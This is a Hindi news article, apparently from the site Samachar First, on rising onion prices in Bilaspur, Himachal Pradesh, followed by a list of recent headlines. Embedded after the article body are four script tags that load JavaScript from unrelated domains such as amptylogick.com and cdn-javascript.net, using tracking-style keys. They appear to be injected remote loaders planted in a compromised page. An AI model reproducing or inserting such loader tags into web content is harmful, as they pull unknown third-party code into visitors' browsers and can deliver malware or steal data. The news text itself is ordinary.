Categories: हिमाचल

बिलासपुरः प्याज की बढ़ती कीमतों से दुकानदार भी कर रहे परहेज

<p>प्याज की लगातार बढ़ रही कीमतों का असर अब सब्जी की दुकानों पर भी पड़ने लगा है। इसके चलते अब दुकानों से प्याज गायब होने लगा है। वहीं बात करें बिलासपुर की तो कई ऐसी सब्जी की दुकाने है जहां अब प्याज देखने को भी नहीं मिल रहा है। सब्जी विक्रेताओं की माने तो प्याज की आसमान छूती कीमतों के चलते वह प्याज खरीदने से परहेज कर रहे है तो वहीं महंगे होते प्याज ने आम लोगों के बजट को भी बिगाड़ कर रख दिया है।&nbsp;&nbsp; &nbsp;</p>

<p>लगातार बढ़ रही कीमत ने ना केवल आम लोगों के आसु निकाले है बल्कि अब सब्जी विक्रेताओं की नाक में भी दम कर दिया है। जिसके चलते कई ऐसे सब्जी विक्रेता है जिन्होंने प्याज की खरीदारी बंद कर दी है। बिलासपुर बस स्टैंड के नजदीक सब्जी मंडी में भी आजकल कुछ ऐसा ही हाल देखने को मिल रहे हैं। जहां प्याज की बढ़ती कीमतों ने बाजार से प्याज को ही गायब कर दिया है, यह सुनकर आप जरूर हैरान रह जायेंगे लेकिन ये ही हकीकत है।</p>

<p>बिलासपुर में प्याज की कीमत 80 रूपए किलो पहुंच चुकी है। जिसका सीधा असर आम लोगों की जेब पर पड़ रहा है, जहां एक ओर घर की गृहणी प्याज लेने से कतराने लगी है तो वहीं अब दुकानदार भी आसमान छूती प्याज की कीमतों के चलते खरीदारीं से परहेज करते दिखाई दे रहे है। स्थानीय लोगों की माने तो प्याज की बड़ी कीमतों के चलते उनके बजट पर असर पड़ने लगा है जिसके चलते वह प्याज की खरीदारी नहीं कर रहे है। वहीं सब्जी विक्रेताओं का कहना है की पिछले कुछ दिनों से प्याज की कीमत लगातार बढ़ने से प्याज खरीदारी और उनकी दुकानदारी पर असर पड़ा है और उन्होंने नुकसान से बचने के लिए मंडी से प्याज खरिदरना बंद कर दिया है। साथ ही सब्जी विक्रेताओं ने जल्द ही प्याज की कीमतों पर नियंत्रण लगाने की सरकार को अपील भी की है।</p>

<p>&nbsp;</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575543389213″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

चंडीगढ़ सेक्टर 42 कॉलेज में हिमाचल की बेटी ने प्रेरणा ने मारी बाजी

चंडीगढ़ सेक्टर-42 के गवर्नमेंट पीजी गर्ल्स कॉलेज में चल रही चुनाव में हिमाचल प्रदेश के…

18 hours ago

संजौली मस्जिद विवाद को लेकर एमसी आयुक्त के कोर्ट में सुनवाई

सबंधित जेई और वक्फ बोर्ड को लगी फटकार, मामले की 5 अक्टूबर को अगली सुनवाई,जेई…

18 hours ago

इंस्पायर मानक अवार्ड के लिए 15 सितंबर तक छात्र करवा सकते है आवेदन

हमीरपुर, कांगड़ा व चंबा के छात्र लेंगे भाग अभी तक कई स्कूलों ने नहीं किया…

18 hours ago

निबंध लेखन में रितिका ने हासिल किया पहला स्थान

भाषा-संस्कृति विभाग जिला कांगडा़ द्वारा जिला स्तरीय राजभाषा हिन्दीं पखवाडे का आयोजन जी.ए.वी स्कूल कांगडा…

19 hours ago

परशुराम चौक बाजार में जलभराव की समस्या से मिली निजात, व्यापारी खुश

पांवटा साहिब- शहर में जल भराव की समस्या से निपटने के लिए नगर निगम द्वारा…

19 hours ago

राज्य में खेल गतिविधियों को बढ़ावा देने के लिए प्रदेश सरकार प्रतिबद्धः केवल पठानिया

धर्मशाला, 6 सितम्बर: उपमुख्य सचेतक व विधायक शाहपुर केवल सिंह पठानिया ने आज शाहपुर विधानसभा…

1 day ago